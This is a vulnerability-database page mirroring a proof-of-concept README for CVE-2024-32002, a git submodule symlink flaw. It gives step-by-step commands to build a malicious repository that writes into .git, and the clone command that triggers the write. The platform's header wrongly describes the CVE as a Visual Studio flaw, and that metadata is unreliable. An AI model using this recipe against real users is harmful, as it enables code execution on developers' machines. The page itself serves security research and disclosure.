漏洞平台

POC详情： 616665ca68d2b6feda4456e06f3851ea5625c5bc

来源

https://github.com/JakobTheDev/cve-2024-32002-poc-aw

关联漏洞

标题： Microsoft Visual Studio 安全漏洞 (CVE-2024-32002)
描述：Microsoft Visual Studio是美国微软（Microsoft）公司的一款开发工具套件系列产品，也是一个基本完整的开发工具集，它包括了整个软件生命周期中所需要的大部分工具。 Microsoft Visual Studio存在安全漏洞的相关信息，请随时关注CNNVD或厂商公告。

描述

A POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.

介绍

# CVE-2024-32002 PRC AW
A  POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.

See [cve-2024-32002-submodule-aw](https://github.com/JakobTheDev/cve-2024-32002-submodule-aw) for the related submodule repository.

## What this repo contains
- A symlink with an arbitraty name that links to the `.git` directory.
- A `.gitmodules` file that defines the malicious submodule.

## How to recreate this repo

This repo was created in Linux (WSL2, to be specific). This is important, the malicious repo can only be created on a case-sensitive filesystem.

1. Create a symlink, using all lowercase characters

```bash
ln -s .git submodule
```

Notes:
- The symlink should point to the .git folder, since this is where we want to write files
- The symlink name (submodule) is arbitrary, but should start with a lowercase character
- This is important, because lowercase characters sort earlier than uppercase characters. When the clonong machine gets confused about where to write the submodule files, we want it to choose the symlink and not a normal directory.

2. Add the malicious submodule, noting the case difference on the submodule directory name

```bash
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists
```

Notes:
- The name of the submodule matters, it wil come into play when placing our hook in the submodule.
- The first segment of the submodule's path ("Submodule") should match the symlink name above, just differing in case.
- There must be at least one other segment to the path, since git will only clone submodules into an emptry directory. It will create directories for us though, so we chose "notexists" to demonstrate that.

## How to run the POC

1. Check whether you have a vulnerable version of git. See the [GitHub advisory](https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv) for affected versions.
```bash
git --version
```
2. Think about whether you knowingly want to run a command that could achieve RCE... This repo is benign, but are you sure?
3. Run the following command:
```bash
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git
```
4. Take a look in the .git directory. See anything out of place. Hint: What files are in the [submodule](https://github.com/JakobTheDev/cve-2024-32002-submodule-aw).

文件快照


 [4.0K]  /data/pocs/616665ca68d2b6feda4456e06f3851ea5625c5bc
├── [1.0K]  LICENSE
├── [2.3K]  README.md
├── [   4]  submodule -> .git
└── [4.0K]  Submodule
    └── [4.0K]  notexists

3 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。